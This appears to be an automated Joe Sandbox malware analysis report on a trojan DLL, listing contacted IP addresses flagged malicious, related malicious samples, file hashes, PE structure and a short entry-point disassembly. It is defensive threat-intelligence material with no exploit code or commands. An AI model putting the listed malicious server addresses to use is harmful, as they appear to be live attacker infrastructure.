                      https://www.tiktok.com/legal/report/feedbacksvchost.exe, 00000011.00000003.411715639.0000024AA7DB3000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.411696063.0000024AA7D92000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.411749032.0000024AA8202000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.413775795.0000024AA7D8E000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.411646731.0000024AA7DCA000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.411611343.0000024AA7DCA000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://help.disneyplus.com.svchost.exe, 00000011.00000003.408016367.0000024AA7D92000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.408127045.0000024AA7DB3000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.408267129.0000024AA8202000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://disneyplus.com/legal.svchost.exe, 00000011.00000003.408016367.0000024AA7D92000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.408127045.0000024AA7DB3000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.408267129.0000024AA8202000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      unknown

                      Contacted IPs

                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs

                      Public

                      IPDomainCountryFlagASNASN NameMalicious
                      207.148.81.119
                      unknownUnited States
                      20473AS-CHOOPAUStrue
                      104.131.62.48
                      unknownUnited States
                      14061DIGITALOCEAN-ASNUStrue
                      85.214.67.203
                      unknownGermany
                      6724STRATOSTRATOAGDEtrue
                      191.252.103.16
                      unknownBrazil
                      27715LocawebServicosdeInternetSABRtrue
                      168.197.250.14
                      unknownArgentina
                      264776OmarAnselmoRipollTDCNETARtrue
                      66.42.57.149
                      unknownUnited States
                      20473AS-CHOOPAUStrue
                      185.148.168.15
                      unknownGermany
                      44780EVERSCALE-ASDEtrue
                      51.210.242.234
                      unknownFrance
                      16276OVHFRtrue
                      217.182.143.207
                      unknownFrance
                      16276OVHFRtrue
                      69.16.218.101
                      unknownUnited States
                      32244LIQUIDWEBUStrue
                      159.69.237.188
                      unknownGermany
                      24940HETZNER-ASDEtrue
                      45.138.98.34
                      unknownGermany
                      9009M247GBtrue
                      116.124.128.206
                      unknownKorea Republic of
                      9318SKB-ASSKBroadbandCoLtdKRtrue
                      78.46.73.125
                      unknownGermany
                      24940HETZNER-ASDEtrue
                      37.59.209.141
                      unknownFrance
                      16276OVHFRtrue
                      210.57.209.142
                      unknownIndonesia
                      38142UNAIR-AS-IDUniversitasAirlanggaIDtrue
                      185.148.168.220
                      unknownGermany
                      44780EVERSCALE-ASDEtrue
                      54.37.228.122
                      unknownFrance
                      16276OVHFRtrue
                      190.90.233.66
                      unknownColombia
                      18678INTERNEXASAESPCOtrue
                      142.4.219.173
                      unknownCanada
                      16276OVHFRtrue
                      54.38.242.185
                      unknownFrance
                      16276OVHFRtrue
                      195.154.146.35
                      unknownFrance
                      12876OnlineSASFRtrue
                      195.77.239.39
                      unknownSpain
                      60493FICOSA-ASEStrue
                      78.47.204.80
                      unknownGermany
                      24940HETZNER-ASDEtrue
                      37.44.244.177
                      unknownGermany
                      47583AS-HOSTINGERLTtrue
                      62.171.178.147
                      unknownUnited Kingdom
                      51167CONTABODEtrue
                      128.199.192.135
                      unknownUnited Kingdom
                      14061DIGITALOCEAN-ASNUStrue

                      Private

                      IP
                      192.168.2.1

                      General Information

                      Joe Sandbox Version:34.0.0 Boulder Opal
                      Analysis ID:553115
                      Start date:14.01.2022
                      Start time:10:38:21
                      Joe Sandbox Product:CloudBasic
                      Overall analysis duration:0h 13m 56s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Sample file name:pugKLanrj3 (renamed file extension from none to dll)
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                      Number of analysed new started processes analysed:28
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • HDC enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Detection:MAL
                      Classification:mal96.troj.evad.winDLL@21/2@0/28
                      EGA Information:
                      • Successful, ratio: 100%
                      HDC Information:
                      • Successful, ratio: 43.3% (good quality ratio 41.2%)
                      • Quality average: 76.7%
                      • Quality standard deviation: 28.1%
                      HCA Information:
                      • Successful, ratio: 100%
                      • Number of executed functions: 41
                      • Number of non-executed functions: 129
                      Cookbook Comments:
                      • Adjust boot time
                      • Enable AMSI
                      • Override analysis time to 240s for rundll32
                      Warnings:
                      Show All
                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, wuapihost.exe
                      • Excluded IPs from analysis (whitelisted): 23.211.6.115, 173.222.108.210, 173.222.108.226, 40.91.112.76, 20.54.110.249
                      • Excluded domains from analysis (whitelisted): client.wns.windows.com, displaycatalog-rp-uswest.md.mp.microsoft.com.akadns.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu-shim.trafficmanager.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, store-images.s-microsoft.com-c.edgekey.net, ctldl.windowsupdate.com, a767.dspw65.akamai.net, wus2-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, arc.msn.com, download.windowsupdate.com.edgesuite.net, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com, consumer-displaycatalogrp-aks2aks-uswest.md.mp.microsoft.com.akadns.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                      • Not all processes where analyzed, report is missing behavior information
                      • Report creation exceeded maximum time and may have missing disassembly code information.
                      • Report size exceeded maximum capacity and may have missing behavior information.
                      • Report size getting too big, too many NtOpenKeyEx calls found.
                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                      • Report size getting too big, too many NtQueryValueKey calls found.

                      Simulations

                      Behavior and APIs

                      TimeTypeDescription
                      10:40:12API Interceptor7x Sleep call for process: svchost.exe modified

                      Joe Sandbox View / Context

                      IPs

                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                      207.148.81.119CSxylfUJcL.dllGet hashmaliciousBrowse
                        nCiZXrlB39.dllGet hashmaliciousBrowse
                          bEK6Xc41qp.dllGet hashmaliciousBrowse
                            vHwdqVl8yP.dllGet hashmaliciousBrowse
                              wg1bXKYOOs.dllGet hashmaliciousBrowse
                                SecuriteInfo.com.Trojan.Agent.FRJZ.37.xlsmGet hashmaliciousBrowse
                                  qJQ5zHpsbm.dllGet hashmaliciousBrowse
                                    EtUNsUHRzq.dllGet hashmaliciousBrowse
                                      PyqpE3VUI3.dllGet hashmaliciousBrowse
                                        SecuriteInfo.com.Trojan.Agent.FRJZ.31437.xlsmGet hashmaliciousBrowse
                                          P6h9ZprN2X.dllGet hashmaliciousBrowse
                                            SecuriteInfo.com.Trojan.Agent.FRJZ.15200.xlsmGet hashmaliciousBrowse
                                              P6h9ZprN2X.dllGet hashmaliciousBrowse
                                                TkXWcfci7G.dllGet hashmaliciousBrowse
                                                  SecuriteInfo.com.Trojan.Agent.FRJZ.29393.xlsmGet hashmaliciousBrowse
                                                    SecuriteInfo.com.Trojan.Agent.FRJZ.18721.xlsmGet hashmaliciousBrowse
                                                      SecuriteInfo.com.Trojan.Agent.FRJZ.3593.xlsmGet hashmaliciousBrowse
                                                        SecuriteInfo.com.Trojan.Agent.FRJZ.5957.xlsmGet hashmaliciousBrowse
                                                          GxRg3MtYpO.dllGet hashmaliciousBrowse
                                                            SecuriteInfo.com.Trojan.Agent.FRJZ.4911.xlsmGet hashmaliciousBrowse
                                                              104.131.62.48CSxylfUJcL.dllGet hashmaliciousBrowse
                                                                nCiZXrlB39.dllGet hashmaliciousBrowse
                                                                  bEK6Xc41qp.dllGet hashmaliciousBrowse
                                                                    vHwdqVl8yP.dllGet hashmaliciousBrowse
                                                                      wg1bXKYOOs.dllGet hashmaliciousBrowse
                                                                        SecuriteInfo.com.Trojan.Agent.FRJZ.37.xlsmGet hashmaliciousBrowse
                                                                          qJQ5zHpsbm.dllGet hashmaliciousBrowse
                                                                            EtUNsUHRzq.dllGet hashmaliciousBrowse
                                                                              PyqpE3VUI3.dllGet hashmaliciousBrowse
                                                                                SecuriteInfo.com.Trojan.Agent.FRJZ.31437.xlsmGet hashmaliciousBrowse
                                                                                  P6h9ZprN2X.dllGet hashmaliciousBrowse
                                                                                    SecuriteInfo.com.Trojan.Agent.FRJZ.15200.xlsmGet hashmaliciousBrowse
                                                                                      P6h9ZprN2X.dllGet hashmaliciousBrowse
                                                                                        TkXWcfci7G.dllGet hashmaliciousBrowse
                                                                                          SecuriteInfo.com.Trojan.Agent.FRJZ.29393.xlsmGet hashmaliciousBrowse
                                                                                            SecuriteInfo.com.Trojan.Agent.FRJZ.18721.xlsmGet hashmaliciousBrowse
                                                                                              SecuriteInfo.com.Trojan.Agent.FRJZ.3593.xlsmGet hashmaliciousBrowse
                                                                                                SecuriteInfo.com.Trojan.Agent.FRJZ.5957.xlsmGet hashmaliciousBrowse
                                                                                                  GxRg3MtYpO.dllGet hashmaliciousBrowse
                                                                                                    SecuriteInfo.com.Trojan.Agent.FRJZ.4911.xlsmGet hashmaliciousBrowse

                                                                                                      Domains

                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                      windowsupdate.s.llnwi.netCSxylfUJcL.dllGet hashmaliciousBrowse
                                                                                                      • 41.63.96.128
                                                                                                      nCiZXrlB39.dllGet hashmaliciousBrowse
                                                                                                      • 95.140.236.0
                                                                                                      bEK6Xc41qp.dllGet hashmaliciousBrowse
                                                                                                      • 41.63.96.128
                                                                                                      vHwdqVl8yP.dllGet hashmaliciousBrowse
                                                                                                      • 95.140.236.0
                                                                                                      wg1bXKYOOs.dllGet hashmaliciousBrowse
                                                                                                      • 41.63.96.128
                                                                                                      SecuriteInfo.com.Trojan.Agent.FRJZ.15200.xlsmGet hashmaliciousBrowse
                                                                                                      • 178.79.242.0
                                                                                                      SecuriteInfo.com.Trojan.Agent.FRJZ.4911.xlsmGet hashmaliciousBrowse
                                                                                                      • 95.140.236.128
                                                                                                      SecuriteInfo.com.Trojan.Agent.FRJZ.9674.xlsmGet hashmaliciousBrowse
                                                                                                      • 95.140.236.128
                                                                                                      SecuriteInfo.com.Trojan.Agent.FRJZ.20696.xlsmGet hashmaliciousBrowse
                                                                                                      • 178.79.242.0
                                                                                                      qyqbwh33325851.xlsmGet hashmaliciousBrowse
                                                                                                      • 95.140.230.192
                                                                                                      Vogxx6aXgA.dllGet hashmaliciousBrowse
                                                                                                      • 95.140.236.0
                                                                                                      K337Ax5xIs.dllGet hashmaliciousBrowse
                                                                                                      • 41.63.96.128
                                                                                                      RmgO44zN8B.xlsxGet hashmaliciousBrowse
                                                                                                      • 41.63.96.0
                                                                                                      o7GqaY5L5D.xlsxGet hashmaliciousBrowse
                                                                                                      • 95.140.230.192
                                                                                                      NewPurchaseOrder.exeGet hashmaliciousBrowse
                                                                                                      • 95.140.236.0
                                                                                                      MSC INVOICE.xlsxGet hashmaliciousBrowse
                                                                                                      • 178.79.225.128
                                                                                                      49HhrNxVP4.dllGet hashmaliciousBrowse
                                                                                                      • 95.140.236.128
                                                                                                      mxXf3QkvqB.dllGet hashmaliciousBrowse
                                                                                                      • 41.63.96.0
                                                                                                      ZoRy73dQrV.dllGet hashmaliciousBrowse
                                                                                                      • 178.79.242.128
                                                                                                      DpWifKzilH.dllGet hashmaliciousBrowse
                                                                                                      • 178.79.242.128

                                                                                                      ASN

                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                      AS-CHOOPAUSCSxylfUJcL.dllGet hashmaliciousBrowse
                                                                                                      • 66.42.57.149
                                                                                                      nCiZXrlB39.dllGet hashmaliciousBrowse
                                                                                                      • 66.42.57.149
                                                                                                      bEK6Xc41qp.dllGet hashmaliciousBrowse
                                                                                                      • 66.42.57.149
                                                                                                      vHwdqVl8yP.dllGet hashmaliciousBrowse
                                                                                                      • 66.42.57.149
                                                                                                      wg1bXKYOOs.dllGet hashmaliciousBrowse
                                                                                                      • 66.42.57.149
                                                                                                      SecuriteInfo.com.Trojan.Agent.FRJZ.37.xlsmGet hashmaliciousBrowse
                                                                                                      • 66.42.57.149
                                                                                                      qJQ5zHpsbm.dllGet hashmaliciousBrowse
                                                                                                      • 66.42.57.149
                                                                                                      EtUNsUHRzq.dllGet hashmaliciousBrowse
                                                                                                      • 66.42.57.149
                                                                                                      PyqpE3VUI3.dllGet hashmaliciousBrowse
                                                                                                      • 66.42.57.149
                                                                                                      SecuriteInfo.com.Trojan.Agent.FRJZ.31437.xlsmGet hashmaliciousBrowse
                                                                                                      • 66.42.57.149
                                                                                                      P6h9ZprN2X.dllGet hashmaliciousBrowse
                                                                                                      • 66.42.57.149
                                                                                                      SecuriteInfo.com.Trojan.Agent.FRJZ.15200.xlsmGet hashmaliciousBrowse
                                                                                                      • 66.42.57.149
                                                                                                      P6h9ZprN2X.dllGet hashmaliciousBrowse
                                                                                                      • 66.42.57.149
                                                                                                      TkXWcfci7G.dllGet hashmaliciousBrowse
                                                                                                      • 66.42.57.149
                                                                                                      SecuriteInfo.com.Trojan.Agent.FRJZ.29393.xlsmGet hashmaliciousBrowse
                                                                                                      • 66.42.57.149
                                                                                                      SecuriteInfo.com.Trojan.Agent.FRJZ.18721.xlsmGet hashmaliciousBrowse
                                                                                                      • 66.42.57.149
                                                                                                      SecuriteInfo.com.Trojan.Agent.FRJZ.3593.xlsmGet hashmaliciousBrowse
                                                                                                      • 66.42.57.149
                                                                                                      CaaBlZ3pOc.exeGet hashmaliciousBrowse
                                                                                                      • 149.28.78.238
                                                                                                      SecuriteInfo.com.Trojan.Agent.FRJZ.5957.xlsmGet hashmaliciousBrowse
                                                                                                      • 66.42.57.149
                                                                                                      GxRg3MtYpO.dllGet hashmaliciousBrowse
                                                                                                      • 66.42.57.149
                                                                                                      DIGITALOCEAN-ASNUSCSxylfUJcL.dllGet hashmaliciousBrowse
                                                                                                      • 128.199.192.135
                                                                                                      nCiZXrlB39.dllGet hashmaliciousBrowse
                                                                                                      • 128.199.192.135
                                                                                                      bEK6Xc41qp.dllGet hashmaliciousBrowse
                                                                                                      • 128.199.192.135
                                                                                                      vHwdqVl8yP.dllGet hashmaliciousBrowse
                                                                                                      • 128.199.192.135
                                                                                                      wg1bXKYOOs.dllGet hashmaliciousBrowse
                                                                                                      • 128.199.192.135
                                                                                                      SecuriteInfo.com.Trojan.Agent.FRJZ.37.xlsmGet hashmaliciousBrowse
                                                                                                      • 128.199.192.135
                                                                                                      qJQ5zHpsbm.dllGet hashmaliciousBrowse
                                                                                                      • 128.199.192.135
                                                                                                      EtUNsUHRzq.dllGet hashmaliciousBrowse
                                                                                                      • 128.199.192.135
                                                                                                      tijXCZsbGe.exeGet hashmaliciousBrowse
                                                                                                      • 188.166.28.199
                                                                                                      PyqpE3VUI3.dllGet hashmaliciousBrowse
                                                                                                      • 128.199.192.135
                                                                                                      SecuriteInfo.com.Trojan.Agent.FRJZ.31437.xlsmGet hashmaliciousBrowse
                                                                                                      • 128.199.192.135
                                                                                                      P6h9ZprN2X.dllGet hashmaliciousBrowse
                                                                                                      • 128.199.192.135
                                                                                                      SecuriteInfo.com.Trojan.Agent.FRJZ.15200.xlsmGet hashmaliciousBrowse
                                                                                                      • 128.199.192.135
                                                                                                      P6h9ZprN2X.dllGet hashmaliciousBrowse
                                                                                                      • 128.199.192.135
                                                                                                      TkXWcfci7G.dllGet hashmaliciousBrowse
                                                                                                      • 128.199.192.135
                                                                                                      SecuriteInfo.com.Trojan.Agent.FRJZ.29393.xlsmGet hashmaliciousBrowse
                                                                                                      • 128.199.192.135
                                                                                                      SecuriteInfo.com.Trojan.Agent.FRJZ.18721.xlsmGet hashmaliciousBrowse
                                                                                                      • 128.199.192.135
                                                                                                      JBtjAS1TGq.exeGet hashmaliciousBrowse
                                                                                                      • 188.166.28.199
                                                                                                      SecuriteInfo.com.Trojan.Agent.FRJZ.3593.xlsmGet hashmaliciousBrowse
                                                                                                      • 128.199.192.135
                                                                                                      SecuriteInfo.com.Trojan.Agent.FRJZ.5957.xlsmGet hashmaliciousBrowse
                                                                                                      • 128.199.192.135

                                                                                                      JA3 Fingerprints

                                                                                                      No context

                                                                                                      Dropped Files

                                                                                                      No context

                                                                                                      Created / dropped Files

                                                                                                      C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
                                                                                                      Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                      File Type:Microsoft Cabinet archive data, 61414 bytes, 1 file
                                                                                                      Category:dropped
                                                                                                      Size (bytes):61414
                                                                                                      Entropy (8bit):7.995245868798237
                                                                                                      Encrypted:true
                                                                                                      SSDEEP:1536:EysgU6qmzixT64jYMZ8HbVPGfVDwm/xLZ9rP:wF6qmeo4eH1m9wmLvrP
                                                                                                      MD5:ACAEDA60C79C6BCAC925EEB3653F45E0
                                                                                                      SHA1:2AAAE490BCDACCC6172240FF1697753B37AC5578
                                                                                                      SHA-256:6B0CECCF0103AFD89844761417C1D23ACC41F8AEBF3B7230765209B61EEE5658
                                                                                                      SHA-512:FEAA6E7ED7DDA1583739B3E531AB5C562A222EE6ECD042690AE7DCFF966717C6E968469A7797265A11F6E899479AE0F3031E8CF5BEBE1492D5205E9C59690900
                                                                                                      Malicious:false
                                                                                                      Preview: MSCF............,...................I.......;w........RSNj .authroot.stl..>.(.5..CK..8T....c_.d...A.K...+.d.H..*i.RJJ.IQIR..$t)Kd.-[..T\{..ne......<.w......A..B........c...wi......D....c.0D,L........fy....Rg...=........i,3.3..Z....~^ve<...TF.*...f.zy.,...m.@.0.0...m.3..I(..+..v#...(.2....e...L..*y..V.......~U...."<ke.....l.X:Dt..R<7.5\A7L0=..T.V...IDr..8<....r&...I-.^..b.b.".Af....E.._..r.>.`;,.Hob..S.....7'..\.R$.".g..+..64..@nP.....k3...B.`.G..@D.....L.....`^...#OpW.....!....`.....rf:.}.R.@....gR.#7....l..H.#...d.Qh..3..fCX....==#..M.l..~&....[.J9.\..Ww.....Tx.%....]..a4E...q.+...#.*a..x..O..V.t..Y1!.T..`U...-...< _@...|(.....0..3.`.LU...E0.Gu.4KN....5...?.....I.p..'..........N<.d.O..dH@c1t...[w/...T....cYK.X>.0..Z.....O>..9.3.#9X.%.b...5.YK.E.V.....`./.3.._..nN]..=..M.o.F.._..z....._...gY..!Z..?l....vp.l.:.d.Z..W.....~...N.._.k...&.....$......i.F.d.....D!e.....Y..,.E..m.;.1... $.F..O.F.o_}.uG....,.%.>,.Zx.......o....c../.;....g&.....
                                                                                                      C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
                                                                                                      Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                      File Type:data
                                                                                                      Category:modified
                                                                                                      Size (bytes):328
                                                                                                      Entropy (8bit):3.1040605941295265
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:6:kKD1k8SN+SkQlPlEGYRMY9z+4KlDA3RUeYlUmlUR/t:x9kPlE99SNxAhUeYlUSA/t
                                                                                                      MD5:3165402E7A19F508711A928F33305265
                                                                                                      SHA1:27301CC78DC6AFA0C5B2D96AAA8B6351CB1E7B1F
                                                                                                      SHA-256:9DF712961C4297F889E07FA91321C8C5F93C230A8518D498955136645E952B01
                                                                                                      SHA-512:58BFBBCF9A1A72383661F88E843F3B49D589FE4697C38123DB7F92717D6F83ED135AAE063F654666D35E756FFB9DE183009986DE574CC35CD9E9959BBC12FD54
                                                                                                      Malicious:false
                                                                                                      Preview: p...... .........@d.v...(....................................................... ........q.\].......&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.7.1.e.1.5.c.5.d.c.4.d.7.1.:.0."...

                                                                                                      Static File Info

                                                                                                      General

                                                                                                      File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                      Entropy (8bit):7.087986434992125
                                                                                                      TrID:
                                                                                                      • Win32 Dynamic Link Library (generic) (1002004/3) 95.65%
                                                                                                      • Win32 EXE PECompact compressed (generic) (41571/9) 3.97%
                                                                                                      • Generic Win/DOS Executable (2004/3) 0.19%
                                                                                                      • DOS Executable Generic (2002/1) 0.19%
                                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                      File name:pugKLanrj3.dll
                                                                                                      File size:417792
                                                                                                      MD5:db9535477013554eb17c837e6bd92324
                                                                                                      SHA1:ba4fa056de631759ffa5600dd1142a1280d2f051
                                                                                                      SHA256:df234584db0c8aa194c6873b78c8ae0018f0c5f445c5c8a2e90c5e3131310ad0
                                                                                                      SHA512:2fbcd09418989912d97ca8254db3af942902d9c7cb4039089e5fb55e7d3bddc565b7184df4e3bd8cf27ccf5b17f4ab6f5c2ee36470f461e6c73d2de7c1723076
                                                                                                      SSDEEP:6144:o1ju3jPam65ucnNgDoDUhuGGwKveuv4VKYjHyCAJOhrmBlDxqms9ujAJKedmL/:yMjcuDaUIm9StJorohvsMjmKe
                                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Z'...F...F...F...I...F...I...F...F...D..9....F..9....F..9....F..9....F..9....F..9....F..Rich.F..................PE..L...k+.a...

                                                                                                      File Icon

                                                                                                      Icon Hash:71b018ccc6577131

                                                                                                      Static PE Info

                                                                                                      General

                                                                                                      Entrypoint:0x10017b85
                                                                                                      Entrypoint Section:.text
                                                                                                      Digitally signed:false
                                                                                                      Imagebase:0x10000000
                                                                                                      Subsystem:windows gui
                                                                                                      Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                                                                                                      DLL Characteristics:
                                                                                                      Time Stamp:0x61E02B6B [Thu Jan 13 13:38:51 2022 UTC]
                                                                                                      TLS Callbacks:
                                                                                                      CLR (.Net) Version:
                                                                                                      OS Version Major:4
                                                                                                      OS Version Minor:0
                                                                                                      File Version Major:4
                                                                                                      File Version Minor:0
                                                                                                      Subsystem Version Major:4
                                                                                                      Subsystem Version Minor:0
                                                                                                      Import Hash:90add561a8bf6976696c056c199a41b8

                                                                                                      Entrypoint Preview

                                                                                                      Instruction
                                                                                                      cmp dword ptr [esp+08h], 01h
                                                                                                      jne 00007FBB809BE3A7h
                                                                                                      call 00007FBB809C6128h
                                                                                                      push dword ptr [esp+04h]
                                                                                                      mov ecx, dword ptr [esp+10h]
                                                                                                      mov edx, dword ptr [esp+0Ch]
                                                                                                      call 00007FBB809BE292h
                                                                                                      pop ecx
                                                                                                      retn 000Ch
                                                                                                      push 00000000h
                                                                                                      push dword ptr [esp+14h]
                                                                                                      push dword ptr [esp+14h]
                                                                                                      push dword ptr [esp+14h]
                                                                                                      push dword ptr [esp+14h]
                                                                                                      call 00007FBB809C6190h
                                                                                                      add esp, 14h
                                                                                                      ret
                                                                                                      push eax
                                                                                                      push dword ptr fs:[00000000h]
                                                                                                      lea eax, dword ptr [esp+0Ch]
                                                                                                      sub esp, dword ptr [esp+0Ch]
                                                                                                      push ebx
                                                                                                      push esi
                                                                                                      push edi
                                                                                                      mov dword ptr [eax], ebp
                                                                                                      mov ebp, eax
                                                                                                      mov eax, dword ptr [10057A08h]
                                                                                                      xor eax, ebp
                                                                                                      push eax
                                                                                                      push dword ptr [ebp-04h]
                                                                                                      mov dword ptr [ebp-04h], FFFFFFFFh
                                                                                                      lea eax, dword ptr [ebp-0Ch]
                                                                                                      mov dword ptr fs:[00000000h], eax
                                                                                                      ret
                                                                                                      push eax
                                                                                                      push dword ptr fs:[00000000h]
                                                                                                      lea eax, dword ptr [esp+0Ch]
                                                                                                      sub esp, dword ptr [esp+0Ch]
                                                                                                      push ebx
                                                                                                      push esi
                                                                                                      push edi
                                                                                                      mov dword ptr [eax], ebp
                                                                                                      mov ebp, eax
                                                                                                      mov eax, dword ptr [10057A08h]
                                                                                                      xor eax, ebp
                                                                                                      push eax
                                                                                                      mov dword ptr [ebp-10h], esp
                                                                                                      push dword ptr [ebp-04h]
                                                                                                      mov dword ptr [ebp-04h], FFFFFFFFh
                                                                                                      lea eax, dword ptr [ebp-0Ch]
                                                                                                      mov dword ptr fs:[00000000h], eax
                                                                                                      ret
                                                                                                      push eax
                                                                                                      push dword ptr fs:[00000000h]
                                                                                                      lea eax, dword ptr [esp+0Ch]
                                                                                                      sub esp, dword ptr [esp+0Ch]
                                                                                                      push ebx
                                                                                                      push esi
                                                                                                      push edi
                                                                                                      mov dword ptr [eax], ebp
                                                                                                      mov ebp, eax
                                                                                                      mov eax, dword ptr [10057A08h]
                                                                                                      xor eax, ebp
                                                                                                      push eax
                                                                                                      mov dword ptr [ebp-10h], eax

                                                                                                      Rich Headers

                                                                                                      Programming Language:
                                                                                                      • [RES] VS2005 build 50727
                                                                                                      • [ C ] VS2005 build 50727
                                                                                                      • [EXP] VS2005 build 50727
                                                                                                      • [C++] VS2005 build 50727
                                                                                                      • [ASM] VS2005 build 50727
                                                                                                      • [LNK] VS2005 build 50727

                                                                                                      Data Directories

                                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x313c00x50.rdata
                                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x2fdcc0xb4.rdata
                                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x5d0000x3664.rsrc
                                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x610000x3df4.reloc
                                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x2cd600x40.rdata
                                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x290000x440.rdata
                                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x2fd440x40.rdata
                                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                      Sections

                                                                                                      NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                      .text0x10000x27f5e0x28000False0.514996337891data6.66251942868IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                      .rdata0x290000x84100x9000False0.308892144097data4.83079972455IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                      .data0x320000x2a9a00x27000False0.963572966747data7.93281036967IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                      .rsrc0x5d0000x36640x4000False0.274780273438data4.49622273105IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                      .reloc0x610000x82840x9000False0.33251953125data3.82081999119IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                      Resources

                                                                                                      NameRVASizeTypeLanguageCountry
                                                                                                      RT_CURSOR0x5db080x134dataChineseChina
                                                                                                      RT_CURSOR0x5dc3c0xb4dataChineseChina
                                                                                                      RT_CURSOR0x5dcf00x134AmigaOS bitmap fontChineseChina
                                                                                                      RT_CURSOR0x5de240x134dataChineseChina
                                                                                                      RT_CURSOR0x5df580x134dataChineseChina
                                                                                                      RT_CURSOR0x5e08c0x134dataChineseChina
                                                                                                      RT_CURSOR0x5e1c00x134dataChineseChina
                                                                                                      RT_CURSOR0x5e2f40x134dataChineseChina
                                                                                                      RT_CURSOR0x5e4280x134dataChineseChina
                                                                                                      RT_CURSOR0x5e55c0x134dataChineseChina
                                                                                                      RT_CURSOR0x5e6900x134dataChineseChina
                                                                                                      RT_CURSOR0x5e7c40x134dataChineseChina
                                                                                                      RT_CURSOR0x5e8f80x134AmigaOS bitmap fontChineseChina
                                                                                                      RT_CURSOR0x5ea2c0x134dataChineseChina
                                                                                                      RT_CURSOR0x5eb600x134dataChineseChina
                                                                                                      RT_CURSOR0x5ec940x134dataChineseChina
                                                                                                      RT_BITMAP0x5edc80xb8dataChineseChina
                                                                                                      RT_BITMAP0x5ee800x144dataChineseChina
